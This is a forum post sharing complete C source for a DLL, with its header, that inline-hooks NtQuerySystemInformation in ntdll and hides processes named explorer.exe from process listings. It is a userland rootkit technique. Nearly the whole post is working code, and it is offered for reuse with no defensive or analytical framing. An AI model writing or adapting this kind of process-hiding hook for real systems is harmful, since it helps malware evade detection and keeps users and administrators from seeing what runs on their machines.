Jump to content
Nytro

[c] Process Hiding

By Nytro, in Programare

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[c] Process Hiding

Author: stdio

I didnt really see a good c example so I decided to share my dll that hooks NtQuerySystemInformation and hides explorer.exe

#include <Windows.h>
#include "sysinfo.h"

BYTE OrigBytes[5];
WCHAR g_TargetProc[] = L"explorer.exe";

__declspec(naked) NTSTATUS NTAPI  OriginalNtQuerySystemInformation(
		IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
		IN OUT PVOID SystemInformation,
		IN ULONG SystemInformationLength,
		OUT PULONG ReturnLength OPTIONAL
	)
{
    __asm
    {
		mov eax, 0dfh //5 Bytes overwritten	with original read 5
        mov ecx, 0xcafebabe 
        jmp ecx             
    }
}

NTSTATUS NTAPI HookedNtQuerySystemInformation(
		IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
		IN OUT PVOID SystemInformation,
		IN ULONG SystemInformationLength,
		OUT PULONG ReturnLength OPTIONAL
	)
{
	NTSTATUS Result;
	PSYSTEM_PROCESSES pSystemProcess;
	PSYSTEM_PROCESSES pNextSystemProcess;

	Result = OriginalNtQuerySystemInformation(SystemInformationClass,SystemInformation,SystemInformationLength,ReturnLength);

	switch(SystemInformationClass)
	{

		case SystemProcessInformation:

			pSystemProcess = (PSYSTEM_PROCESSES)SystemInformation;
			pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta);

			while(pNextSystemProcess->NextEntryDelta != 0)
			{
				if (lstrcmpW((&pNextSystemProcess->ProcessName)->Buffer,g_TargetProc)==0){
					pSystemProcess->NextEntryDelta += pNextSystemProcess->NextEntryDelta;
				}
				pSystemProcess = pNextSystemProcess;
				pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta);
			}
			break;

	}

	return Result;

}


DWORD PlaceHook()
{
	DWORD oldProtect;
	LPVOID sourceFunction;
	LPVOID destFunction;
	LPVOID stubFunction;

	destFunction = HookedNtQuerySystemInformation;
	stubFunction = OriginalNtQuerySystemInformation;

	sourceFunction = GetProcAddress(GetModuleHandle("ntdll.dll"),"NtQuerySystemInformation");
  	CopyMemory(OrigBytes,sourceFunction,sizeof(BYTE)*5);

    if(sourceFunction == NULL){
        return 1;
    }

	// PatchStub
    VirtualProtect(stubFunction, 9, PAGE_EXECUTE_READWRITE, &oldProtect);
	CopyMemory(stubFunction,OrigBytes,sizeof(BYTE)*5);
    *(LPVOID*)((LPBYTE)stubFunction + 6) = ((LPBYTE)sourceFunction + 5);
    VirtualProtect(stubFunction, 9, oldProtect, &oldProtect);

    //PatchSource
	VirtualProtect(sourceFunction, 5, PAGE_EXECUTE_READWRITE, &oldProtect);
    *(LPBYTE)sourceFunction = 0xE9;
    *(LPVOID *)((LPBYTE)sourceFunction + 1) = (LPVOID)((LPBYTE)destFunction - ((LPBYTE)sourceFunction + 5));
    VirtualProtect(sourceFunction, 5, oldProtect, &oldProtect);

	return 0;
}

void UnHook()
{
	DWORD	oldProtect;

	LPVOID addr = GetProcAddress(GetModuleHandle("ntdll.dll"),"NtQuerySystemInformation");
	VirtualProtect(addr, 5, PAGE_EXECUTE_READWRITE, &oldProtect);
	CopyMemory(addr,OrigBytes,sizeof(BYTE)*5);
	VirtualProtect(addr, 5, oldProtect, &oldProtect);
}



BOOL WINAPI DllMain(HANDLE hinstDLL, DWORD dwReason, LPVOID lpvReserved){

	switch (dwReason){

		case DLL_PROCESS_ATTACH:
			PlaceHook();
			break;
		case DLL_PROCESS_DETACH:
			UnHook();
			break;
	}

	return TRUE;
}

and the header:

#ifndef __SYSINFO_H__
#define __SYSINFO_H__

#ifndef NTSTATUS
#define NTSTATUS LONG
#endif

#define NT_SUCCESS(x) ((x) >= 0)
#define STATUS_SUCCESS	0x00000000

typedef enum _SYSTEM_INFORMATION_CLASS {

SystemBasicInformation, 
SystemProcessorInformation, 
SystemPerformanceInformation, 
SystemTimeOfDayInformation, 
SystemPathInformation, 
SystemProcessInformation, 
SystemCallCountInformation, 
SystemDeviceInformation, 
SystemProcessorPerformanceInformation, 
SystemFlagsInformation, 
SystemCallTimeInformation, 
SystemModuleInformation, 
SystemLocksInformation, 
SystemStackTraceInformation, 
SystemPagedPoolInformation, 
SystemNonPagedPoolInformation, 
SystemHandleInformation, 
SystemObjectInformation, 
SystemPageFileInformation, 
SystemVdmInstemulInformation, 
SystemVdmBopInformation, 
SystemFileCacheInformation, 
SystemPoolTagInformation, 
SystemInterruptInformation, 
SystemDpcBehaviorInformation, 
SystemFullMemoryInformation, 
SystemLoadGdiDriverInformation, 
SystemUnloadGdiDriverInformation, 
SystemTimeAdjustmentInformation, 
SystemSummaryMemoryInformation, 
SystemNextEventIdInformation, 
SystemEventIdsInformation, 
SystemCrashDumpInformation, 
SystemExceptionInformation, 
SystemCrashDumpStateInformation, 
SystemKernelDebuggerInformation, 
SystemContextSwitchInformation, 
SystemRegistryQuotaInformation, 
SystemExtendServiceTableInformation, 
SystemPrioritySeperation, 
SystemPlugPlayBusInformation, 
SystemDockInformation, 
SystemPowerInformation1, 
SystemProcessorSpeedInformation, 
SystemCurrentTimeZoneInformation, 
SystemLookasideInformation

} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;

typedef struct _LSA_UNICODE_STRING {
	USHORT Length;
	USHORT MaximumLength;
	PWSTR  Buffer;
}LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;

typedef CONST PUNICODE_STRING PCUNICODE_STRING;

typedef LONG KPRIORITY;

typedef struct _VM_COUNTERS {
SIZE_T PeakVirtualSize;
SIZE_T VirtualSize;
ULONG PageFaultCount;
SIZE_T PeakWorkingSetSize;
SIZE_T WorkingSetSize;
SIZE_T QuotaPeakPagedPoolUsage;
SIZE_T QuotaPagedPoolUsage;
SIZE_T QuotaPeakNonPagedPoolUsage;
SIZE_T QuotaNonPagedPoolUsage;
SIZE_T PagefileUsage;
SIZE_T PeakPagefileUsage;
} VM_COUNTERS;

typedef struct _CLIENT_ID {
DWORD UniqueProcess;
DWORD UniqueThread;
} CLIENT_ID;

typedef struct _SYSTEM_THREADS {
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientId;
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
LONG State;
LONG WaitReason;
} SYSTEM_THREADS, * PSYSTEM_THREADS;

typedef struct _SYSTEM_PROCESSES { 
		ULONG NextEntryDelta;
		ULONG ThreadCount;
		ULONG Reserved1[6];
		LARGE_INTEGER CreateTime;
		LARGE_INTEGER UserTime;
		LARGE_INTEGER KernelTime;
		UNICODE_STRING ProcessName; 
		KPRIORITY BasePriority;
		ULONG ProcessId;
		ULONG InheritedFromProcessId;
		ULONG HandleCount;
		ULONG Reserved2[2];
		VM_COUNTERS VmCounters;
		IO_COUNTERS IoCounters;  
		SYSTEM_THREADS Threads[1];
	} SYSTEM_PROCESSES, *PSYSTEM_PROCESSES;



typedef NTSTATUS (NTAPI *__NtQuerySystemInformation)(
		IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
		IN OUT PVOID SystemInformation,
		IN ULONG SystemInformationLength,
		OUT PULONG ReturnLength OPTIONAL
	);

#endif

Sursa: [c] Process Hiding

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...